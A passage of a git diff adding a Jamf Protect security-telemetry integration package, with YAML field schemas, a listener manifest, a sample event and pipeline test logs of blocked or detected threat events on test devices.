runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on." + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: "The cloud account or organization ID used to identify different entities in a multi-tenant environment. Examples: AWS account ID, Google Cloud ORG ID, or other unique identifier." + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: "Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime." + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container ID. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: "A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes." + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: "Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider." + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: "Hostname of the host. It normally contains what the `hostname` command returns on the host machine." + - name: id + level: core + type: keyword + ignore_above: 1024 + description: "Unique host ID. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`." + - name: ip + level: core + type: ip + description: Host IP addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: "Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use." + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: "Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment." + - name: containerized + type: boolean + description: >- + If the host is a container. + - name: os.build + type: keyword + example: "18D109" + description: >- + OS build information. + - name: os.codename + type: keyword + example: "stretch" + description: >- + OS codename, if any. +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml b/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml new file mode 100644 index 00000000000..07a6702e13e --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: event.dataset + type: constant_keyword + description: Name of the dataset. + value: jamf_protect.telemetry +- name: event.module + type: constant_keyword + description: Event module. + value: jamf_protect +- name: "@timestamp" + type: date + description: Event timestamp. diff --git a/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml b/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml new file mode 100644 index 00000000000..bc907350357 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml @@ -0,0 +1,177 @@ +- description: |- + ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. + When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. + name: ecs.version + type: keyword +- description: Error code describing the error. + name: error.code + type: keyword +- description: |- + The action captured by the event. + This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. + name: event.action + type: keyword +- description: |- + This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. + `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. + This field is an array. This will allow proper categorization of some events that fall in multiple categories. + name: event.category + type: keyword +- description: |- + Identification code for this event, if one exists. + Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. + name: event.code + type: keyword +- description: |- + `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. + This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. + In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. + In case the two timestamps are identical, `@timestamp` should be used. + name: event.created + type: date +- description: |- + This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. + `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. + The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. + name: event.kind + type: keyword +- description: |- + Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. + This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. + doc_values: false + index: false + name: event.original + type: keyword +- description: |- + This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. + `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. + Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. + Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. + Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. + name: event.outcome + type: keyword +- description: |- + This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. + `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. + This field is an array. This will allow proper categorization of some events that fall in multiple event types. + name: event.type + type: keyword +- description: SHA1 hash. + name: file.hash.sha1 + type: keyword +- description: Full path to the file, including the file name. It should include the drive letter, when appropriate. + multi_fields: + - name: text + type: match_only_text + name: file.path + type: keyword +- description: |- + Use the `os.type` field to categorize the operating system into one of the broad commercial families. + If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + name: host.os.type + type: keyword +- description: |- + Array of process arguments, starting with the absolute path to the executable. + May be filtered to protect sensitive information. + name: process.args + type: keyword +- description: |- + The exit code of the process, if this is a termination event. + The field should be absent if there is no exit code for the event (e.g. process start). + name: process.exit_code + type: long +- description: SHA1 hash. + name: process.hash.sha1 + type: keyword +- description: |- + Process name. + Sometimes called program name or similar. + multi_fields: + - name: text + type: match_only_text + name: process.name + type: keyword +- description: Process id. + name: process.pid + type: long +- description: Process id. + name: process.parent.pid + type: long +- description: Unique identifier for the group on the system/platform. + name: process.real_group.id + type: keyword +- description: Name of the group. + name: process.real_group.name + type: keyword +- description: Unique identifier of the user. + name: process.real_user.id + type: keyword +- description: Short name or login of the user. + multi_fields: + - name: text + type: match_only_text + name: process.real_user.name + type: keyword +- description: Unique identifier of the user. + name: process.user.id + type: keyword +- description: Short name or login of the user. + multi_fields: + - name: text + type: match_only_text + name: process.user.name + type: keyword +- description: All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). + name: related.hash + type: keyword +- description: All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. + name: related.hosts + type: keyword +- description: All of the IPs seen on your event. + name: related.ip + type: ip +- description: IP address of the server (IPv4 or IPv6). + name: server.ip + type: ip +- description: Port of the server. + name: server.port + type: long +- description: All the user names or other user identifiers seen on the event. + name: related.user + type: keyword +- description: List of keywords used to tag each event. + name: tags + type: keyword +- description: Unique identifier of the user. + name: user.effective.id + type: keyword +- description: Short name or login of the user. + multi_fields: + - name: text + type: match_only_text + name: user.effective.name + type: keyword +- description: User email address. + name: user.email + type: keyword +- description: Unique identifier for the group on the system/platform. + name: user.group.id + type: keyword +- description: Name of the group. + name: user.group.name + type: keyword +- description: Unique identifier of the user. + name: user.id + type: keyword +- description: Short name or login of the user. + multi_fields: + - name: text + type: match_only_text + name: user.name + type: keyword +- external: ecs + name: process.code_signature.signing_id +- external: ecs + name: process.code_signature.status +- external: ecs + name: process.code_signature.team_id diff --git a/packages/jamf_protect/data_stream/telemetry/fields/fields.yml b/packages/jamf_protect/data_stream/telemetry/fields/fields.yml new file mode 100644 index 00000000000..acd0afa74b7 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/fields/fields.yml @@ -0,0 +1,656 @@ +- name: jamf_protect.telemetry + type: group + fields: + - name: arguments + type: group + fields: + - name: addr + type: keyword + - name: am_failure + type: keyword + - name: am_success + type: keyword + - name: authenticated + type: flattened + - name: child + type: group + fields: + - name: pid + type: long + - name: data + type: keyword + - name: detail + type: keyword + - name: domain + type: keyword + - name: fd + type: keyword + - name: flags + type: keyword + - name: flattened + type: flattened + - name: known_uid + type: keyword + - name: pid + type: long + - name: port + type: long + - name: priority + type: long + - name: process + type: keyword + - name: protocol + type: keyword + - name: request + type: keyword + - name: sflags + type: keyword + - name: signal + type: keyword + - name: target + type: group + fields: + - name: port + type: long + - name: task + type: group + fields: + - name: port + type: long + - name: type + type: keyword + - name: which + type: keyword + - name: who + type: keyword + - name: attributes + type: group + fields: + - name: device + type: keyword + - name: file + type: group + fields: + - name: access_mode + type: keyword + - name: system + type: group + fields: + - name: id + type: keyword + - name: node + type: group + fields: + - name: id + type: keyword + - name: owner + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: dataset + type: keyword + - name: event_attributes + type: group + fields: + - name: activity_identifier + type: keyword + - name: assessments_enabled + type: long + - name: attributes + type: group + fields: + - name: ctime + type: date + - name: mtime + type: date + - name: path + type: keyword + - name: quarantine + type: group + fields: + - name: agent_bundle_identifier + type: keyword + - name: agent_name + type: keyword + - name: data_url_string + type: keyword + - name: event_identifier + type: keyword + - name: origin_url_string + type: keyword + - name: timestamp + type: date + - name: requirement + type: keyword + - name: audit_event + type: group + fields: + - name: excluded_processes + type: keyword + - name: excluded_users + type: keyword + - name: audit_event_log_verbose_messages + type: keyword + - name: audit_level + type: long + - name: backtrace + type: group + fields: + - name: frames + type: group + fields: + - name: image_offset + type: long + - name: image_uuid + type: keyword + - name: build_alias_of + type: keyword + - name: build_version + type: keyword + - name: category + type: keyword + - name: cf_bundle_short_version_string + type: keyword + - name: cf_bundle_version + type: keyword + - name: dev_id_enabled + type: long + - name: event + type: group + fields: + - name: message + type: keyword + - name: type + type: keyword + - name: file_event + type: group + fields: + - name: exclusion_paths + type: keyword + - name: inclusion_paths + type: keyword + - name: use_fuzzy_match + type: long + - name: file_license_info + type: group + fields: + - name: license_expiration_date + type: date + - name: license_key + type: keyword + - name: license_type + type: keyword + - name: license_version + type: keyword + - name: format_string + type: keyword + - name: job + type: group + fields: + - name: completed_time + type: date + - name: creation_time + type: date + - name: destination + type: keyword + - name: format + type: keyword + - name: id + type: keyword + - name: processing_time + type: date + - name: size + type: keyword + - name: state + type: keyword + - name: title + type: keyword + - name: user + type: keyword + - name: log + type: group + fields: + - name: file + type: group + fields: + - name: location + type: keyword + - name: max_number_backups + type: long + - name: max_size_mega_bytes + type: long + - name: ownership + type: keyword + - name: permission + type: keyword + - name: remote_endpoint_enabled + type: long + - name: remote_endpoint_type + type: keyword + - name: remote_endpoint_type_awskinesis + type: group + fields: + - name: access_key_id + type: keyword + - name: region + type: keyword + - name: secret_key + type: keyword + - name: stream_name + type: keyword + - name: remote_endpoint_url + type: keyword + - name: mach_timestamp + type: keyword + - name: opaque_version + type: keyword + - name: parent_activity_identifier + type: keyword + - name: path + type: keyword + - name: process + type: group + fields: + - name: id + type: long + - name: image + type: group + fields: + - name: path + type: keyword + - name: uuid + type: keyword + - name: project_name + type: keyword + - name: sender + type: group + fields: + - name: id + type: long + - name: image + type: group + fields: + - name: path + type: keyword + - name: uuid + type: keyword + - name: program_counter + type: long + - name: source + type: keyword + - name: source_version + type: keyword + - name: subsystem + type: keyword + - name: timestamp + type: date + - name: timezone_name + type: keyword + - name: thread_id + type: keyword + - name: trace_id + type: keyword + - name: unified_log_predicates + type: keyword + - name: version + type: keyword + - name: event_score + type: long + - name: exec_args + type: group + fields: + - name: args + type: flattened + - name: args_compiled + type: keyword + - name: exec_chain_child + type: group + fields: + - name: parent + type: group + fields: + - name: path + type: text + - name: uuid + type: keyword + - name: exec_chain_parent + type: group + fields: + - name: uuid + type: keyword + - name: exec_env + type: group + fields: + - name: env + type: group + fields: + - name: arch + type: keyword + - name: compiled + type: keyword + - name: malwarebytes_group + type: keyword + - name: path + type: text + - name: shell + type: keyword + - name: ssh_auth_sock + type: keyword + - name: tmpdir + type: keyword + - name: xpc + type: group + fields: + - name: flags + type: keyword + - name: service_name + type: keyword + - name: env_compiled + type: keyword + - name: exit + type: group + fields: + - name: return + type: group + fields: + - name: value + type: long + - name: status + type: keyword + - name: file_event_info + type: group + fields: + - name: eventid_wrapped + type: boolean + - name: history_done + type: boolean + - name: item + type: group + fields: + - name: change_owner + type: boolean + - name: cloned + type: boolean + - name: created + type: boolean + - name: extended_attribute_modified + type: boolean + - name: finder_info_modified + type: boolean + - name: inode_metadata_modified + type: boolean + - name: is_directory + type: boolean + - name: is_file + type: boolean + - name: is_hard_link + type: boolean + - name: is_last_hard_link + type: boolean + - name: is_sym_link + type: boolean + - name: removed + type: boolean + - name: renamed + type: boolean + - name: updated + type: boolean + - name: kernel_dropped + type: boolean + - name: mount + type: boolean + - name: must_scan_sub_dir + type: boolean + - name: none + type: boolean + - name: own_event + type: boolean + - name: root_changed + type: boolean + - name: unmount + type: boolean + - name: user_dropped + type: boolean + - name: hardware_event_info + type: group + fields: + - name: device + type: group + fields: + - name: class + type: keyword + - name: name + type: keyword + - name: status + type: keyword + - name: device_attributes + type: group + fields: + - name: io + type: group + fields: + - name: cf_plugin_types + type: flattened + - name: class_name_override + type: keyword + - name: power_management + type: group + fields: + - name: capability_flags + type: keyword + - name: current_power_state + type: long + - name: device_power_state + type: long + - name: driver_power_state + type: long + - name: max_power_state + type: long + - name: iserial_number + type: long + - name: removable + type: keyword + - name: usb + type: group + fields: + - name: product_name + type: keyword + - name: vendor_name + type: keyword + - name: header + type: group + fields: + - name: action + type: keyword + - name: event_modifier + type: keyword + - name: time_milliseconds_offset + type: long + - name: version + type: keyword + - name: host_info + type: group + fields: + - name: host + type: group + fields: + - name: uuid + type: keyword + - name: identity + type: group + fields: + - name: cd_hash + type: keyword + - name: signer + type: group + fields: + - name: id + type: keyword + - name: id_truncated + type: keyword + - name: type + type: keyword + - name: team + type: group + fields: + - name: id + type: keyword + - name: id_truncated + type: keyword + - name: path + type: keyword + - name: process + type: group + fields: + - name: effective + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: pid + type: long + - name: name + type: keyword + - name: session + type: group + fields: + - name: id + type: keyword + - name: terminal_id + type: group + fields: + - name: addr + type: keyword + - name: ip_address + type: ip + - name: port + type: long + - name: type + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: return + type: group + fields: + - name: description + type: keyword + - name: signal_event_info + type: group + fields: + - name: signal + type: long + - name: socket + type: group + fields: + - name: inet + type: group + fields: + - name: addr + type: keyword + - name: family + type: keyword + - name: id + type: keyword + - name: unix + type: group + fields: + - name: family + type: keyword + - name: path + type: text + - name: subject + type: group + fields: + - name: audit + type: group + fields: + - name: id + type: keyword + - name: user + type: group + fields: + - name: name + type: keyword + - name: effective + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: process + type: group + fields: + - name: name + type: keyword + - name: pid + type: long + - name: responsible + type: group + fields: + - name: process + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: session + type: group + fields: + - name: id + type: keyword + - name: terminal_id + type: group + fields: + - name: addr + type: keyword + - name: port + type: long + - name: type + type: keyword + - name: texts + type: keyword +- name: log.source.address + type: keyword + description: Source address from which the log event was read / sent from. diff --git a/packages/jamf_protect/data_stream/telemetry/manifest.yml b/packages/jamf_protect/data_stream/telemetry/manifest.yml new file mode 100644 index 00000000000..b2bda862ff2 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/manifest.yml @@ -0,0 +1,57 @@ +title: Receives Telemetry from Jamf Protect with Elastic Agent. +type: logs +streams: + - input: http_endpoint + template_path: http_endpoint.yml.hbs + title: Jamf Protect Telemetry + description: Receives Telemetry from Jamf Protect with Elastic Agent. + vars: + - name: listen_port + type: integer + title: Listen Port + description: The port number the listener binds to. + multi: false + required: true + show_user: true + default: 9550 + - name: url + type: text + title: URL + description: This option specifies which URL path to accept requests on. Defaults to /. + multi: false + required: false + show_user: false + default: / + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - jamf_protect-telemetry + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: true + title: Preserve duplicate custom fields + description: Preserve custom fields for all ECS mappings. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/jamf_protect/data_stream/telemetry/sample_event.json b/packages/jamf_protect/data_stream/telemetry/sample_event.json new file mode 100644 index 00000000000..95d345eff1a --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/sample_event.json @@ -0,0 +1,78 @@ +{ + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log new file mode 100644 index 00000000000..12be8625475 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log @@ -0,0 +1,8 @@ +{"event":{"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Threat Events Stream"},"timestamp":"2020-01-30T17:47:41.767Z","alertId":"013b15c9-8f62-4bf1-948a-d82367af2a10","account":{"customerId":"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25","parentId":"7c302632-7ac4-4234-8ada-11d76feb3730","name":"Customer"},"device":{"deviceId":"09f81436-de17-441e-a631-0461252c629b","os":"IOS 11.2.5","deviceName":"Apple iPhone 11 (11.2.5)","userDeviceName":"Apple iPhone 11","externalId":"5087dc0e-876c-4b0e-95ea-5b543476e0c4"},"eventType":{"id":213,"description":"Sideloaded App","name":"SIDE_LOADED_APP_IN_INVENTORY"},"app":{"id":"com.apple.iBooks","name":"Books","version":"1.1","sha1":"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2","sha256":"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042"},"destination":{"name":"host","ip":"ip","port":80},"source":{"ip":"1.2.3.4","port":3025},"location":"gb","accessPoint":"AccessPoint","accessPointBssid":"c6:9f:db:b1:73:5a","severity":6,"user":{"email":"user@mail.com","name":"John Doe"},"eventUrl":"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767","action":"Detected"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-11-24T05:46:08.934Z","alertId":"f296bcf0-134a-4df4-8069-ef273fb8c11b","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a0233aa8a1","parentId":"c00asdfs8916-5bad-406e-8ee7-b125460fffecaf3","name":"Jamf Internal Test Tenant"},"device":{"deviceId":"20bae216-4e47-415f-b16f-518d7aadb3dc","os":"MAC_OS 13.5.1","deviceName":"Mac (13.5.1)","userDeviceName":"ryan’s MacBook Pro","externalId":"62193e5b-eb07-5835-8502-89b000578b4f"},"eventType":{"id":"204","description":"Vulnerable O/S","name":"OUTDATED_OS"},"app":{},"destination":{},"source":{},"severity":10,"user":{"email":"john.doe@jamf.com","name":"testinguser"},"eventUrl":"https://radar.wandera.com/security/events/detail/f296bcf0-134a-4df4-8069-ef273fb8c11b.OUTDATED_OS?createdUtcMs=1700804768934","action":"Detected"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2024-01-10T12:20:37.059Z","alertId":"8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599","account":{"customerId":"b36f2900-bf35-4661-bd4f-21d66a1199b7","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Portal - Thijs Xhaflaire"},"device":{"deviceId":"32ce61c6-a7b7-400b-b3bb-d048464f47b2","os":"UNKNOWN 14.0.0","deviceName":"Mac (14.0.0)","userDeviceName":"VMAC-HKDV5R2L6","externalId":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"52.92.33.124","name":"malware.threatops.co.uk"},"source":{},"location":"GB","severity":8,"user":{"email":"a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd","name":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventUrl":"https://radar.wandera.com/security/events/detail/8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599.ACCESS_BAD_HOST?createdUtcMs=1704889237059","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2024-01-10T12:20:28.506Z","alertId":"6303f01e-f8fb-4a36-a339-95d721d9bb02","account":{"customerId":"b36f2900-bf35-4661-bd4f-21d66a1199b7","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Portal - Thijs Xhaflaire"},"device":{"deviceId":"32ce61c6-a7b7-400b-b3bb-d048464f47b2","os":"UNKNOWN 14.0.0","deviceName":"Mac (14.0.0)","userDeviceName":"VMAC-HKDV5R2L6","externalId":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"89.238.73.97","name":"eicar.org"},"source":{},"location":"GB","severity":8,"user":{"email":"a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd","name":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventUrl":"https://radar.wandera.com/security/events/detail/6303f01e-f8fb-4a36-a339-95d721d9bb02.ACCESS_BAD_HOST?createdUtcMs=1704889228506","action":"Blocked"}} +{"event":{"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Threat Events Stream"},"timestamp":"2023-02-21T13:10:40.410Z","alertId":"debd2e4b-9da1-454e-952d-18a00b42ffce","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf - CE Security Team"},"device":{"deviceId":"e9671102-5ccf-4e66-a6b3-b117ba257d5f","os":"UNKNOWN 13.2.1","deviceName":"Mac (13.2.1)","userDeviceName":"darrow","externalId":"0c221ae4-50af-5e39-8275-4424cc87ab8e"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{"id":null,"name":null,"version":null,"sha1":null,"sha256":null},"destination":{"name":"secure.eicar.org","ip":"2a00:1828:1000:2497::2","port":null},"source":{"ip":null,"port":null},"location":"GB","accessPoint":null,"accessPointBssid":null,"severity":8,"user":{"email":"allen.golbig@jamfse.io","name":"Allen Golbig"},"eventUrl":"https://radar.wandera.com/security/events/detail/debd2e4b-9da1-454e-952d-18a00b42ffce.ACCESS_BAD_HOST?createdUtcMs=1676985040410","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-28T13:36:52.187Z","alertId":"0c925382-dceb-486e-82b4-2a75f259e15e","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf Internal Test Portal - Ryan Legg"},"device":{"deviceId":"3453be41-0f2d-4d43-9ec2-a53f39fff93c","os":"IOS 17.2.1","deviceName":"Apple iPhone (17.2.1)","userDeviceName":"c244cb17-6af8-4a62-98b5-9e6f2d3f89dd"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"18.154.219.62","name":"sli.bidagy.com"},"source":{"ip":"107.10.7.168"},"location":"US","severity":8,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventUrl":"https://radar.wandera.com/security/events/detail/0c925382-dceb-486e-82b4-2a75f259e15e.ACCESS_BAD_HOST?createdUtcMs=1703770612187","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-25T12:16:37.261Z","alertId":"e5f479d7-5301-402d-b776-a099e6fab817","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf Internal Test Portal - Ryan Legg"},"device":{"deviceId":"cd531c8a-26ed-419a-8fd4-f67702f40ad5","os":"IOS 17.2","deviceName":"Apple iPad (17.2)","userDeviceName":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"45.55.83.107","name":"servedby.aqua-adserver.com"},"source":{"ip":"107.10.7.168"},"location":"US","severity":8,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventUrl":"https://radar.wandera.com/security/events/detail/e5f479d7-5301-402d-b776-a099e6fab817.ACCESS_BAD_HOST?createdUtcMs=1703506597261","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-11T21:50:47.929Z","alertId":"bbe5c381-0647-4a01-be29-691e7ed908dd","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf Internal Test Portal - Ryan 